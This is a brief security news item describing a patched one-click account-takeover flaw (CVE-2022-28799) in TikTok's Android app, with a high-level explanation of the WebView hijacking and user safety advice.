A high-severity flaw was spotted in the TikTok Android app allowing attackers to take over accounts just with a single click. The flaw, spotted in February, tricks the targeted victims into clicking a malicious link.

Diving into details

According to Microsoft, the attackers could abuse the flaw, identified as CVE-2022-28799, to hijack users’ accounts and get access to their sensitive information.
  • Experts noted that clicking on the malicious link exposed 70 methods that could be used by an attacker with an exploit to hijack the WebView component of the TikTok app.
  • Attackers can use that access to modify users' TikTok profiles and sensitive information, such as sending messages, posting private videos, and uploading videos on behalf of users.
  • Further, the attackers can retrieve the users' authentication tokens. This is done by triggering a request to a server under their control and further logging the cookie and request headers.

About the flaw

The flaw is a WebView Hijacking vulnerability in the TikTok application that occurs due to an unvalidated deep link on an unsanitized parameter. 
  • The abuse may lead to account hijacking via JavaScript interface.
  • The security vulnerability is now patched since the release of TikTok version 23.7.3.
  • Researchers have not yet discovered evidence of CVE-2022-28799 being exploited in the wild.

What to do?

TikTok is a popular application with over a billion downloads, which could be a good motivation for attackers. To stay protected, users should avoid clicking on links coming from untrusted sources, update their apps regularly, and only install apps from genuine sources. Further, report any unusual app behavior as soon as possible.
Cyware Publisher